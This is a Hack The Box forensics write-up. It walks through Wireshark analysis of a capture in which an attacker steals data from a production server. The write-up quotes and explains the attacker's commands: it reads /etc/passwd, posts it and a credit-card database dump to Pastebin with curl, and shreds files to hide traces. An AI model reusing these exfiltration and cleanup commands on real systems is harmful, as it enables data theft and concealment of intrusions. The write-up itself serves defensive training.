Marshal In the Middle - Hack The Box Write-Up

Marshal In the Middle - Hack The Box Write-Up

The security team was alerted to suspicious network activity from a production web server. Can you determine if any data was stolen and what it was?”

Let's have a look at the files, we can see that we have one folder called “bro”. You may think that you are working with a very friendly customer but in reality Bro was a popular network intrusion detection system. Developed in the late 1990s was later rebranded as "Zeek".Enough of history lessons, we got a case to solve.

First lets open chalcap.pcapng on Wireshark. Let's go to statistics and click on endpoints to filter the content and have a better perspective. We see a lot of traffic mainly related to HTTP/HTTPS on ports 80 and 443, this all looks relatively normal. But when we take a look at TCP connections, there is one particular connection that seems strange.

A TCP connection on port 53 can be considered weird or unusual because port 53 is traditionally associated with the Domain Name System (DNS) service, and DNS primarily uses the User Datagram Protocol (UDP) for its communication.

If we filter our logs by the IP and port information using right click and follow the TCP stream we can find something very interesting

Seems like we found the vector used by the attacker! Let's break it down so we can understand better:

  1. ping -c3 mysql-m1.prod.htb: This command is used to ping the host named "mysql-m1.prod.htb" three times. Probably to check if the server was up!

  2. ./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump: This command is executing a script named "exfildb.sh" with specific arguments. It seems to be an attempt to extract or dump a database from the host "mysql-m1.prod.htb" on port 3306 using the credentials "root:p4ssw0rd".

  3. pastetext=$(cat /etc/passwd); This command reads the content of the "/etc/passwd" file and stores it in the variable "pastetext".

  4. curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" '<https://pastebin.com/api/api_post.php':> This command is using the "curl" tool to make an HTTP POST request to the pastebin.com API. It appears to be pasting the contents of the "/etc/passwd" file on pastebin.com.

    1. Next, the cybercriminal attempts to read the first four lines of a file named "dbdump" but encounters an error as the file does not exist ("No such file or directory").

    2. Then lists the files in the current directory ("/tmp/.h4x") and finds the files "dumpdb," "dump_tmp," and "exfildb.sh."

    3. The cybercriminal successfully reads the first four lines of the "dumpdb" file, which appears to contain data related to credit card information.

    4. The user attempts to paste the content of the "dumpdb" file on Pastebin, and the response indicates a successful paste with a link to the content.

    5. Finally, the user changes the directory to the root ("/") and uses the find command along with the shred command to securely delete the files in the "/tmp/.h4x" directory. The shred command overwrites the files with random data before deleting them, enhancing a better way to delete his trace.

We need to take a look at what is inside that Pastebin to fulfil our goal, the HTTPS traffic is encrypted but we have been provided with the secret.log file that contains the key for decryption.

Let's go to Wireshark preferences on the edit tab above and look for the TLS protocol, we will be able to add the path of our secret.log file there:

Let's look at that HTTP stream now that is decrypted --> http.host == "pastebin.com"

Again like before let's follow the stream!

Keep scrolling down and you fill find that juicy flag!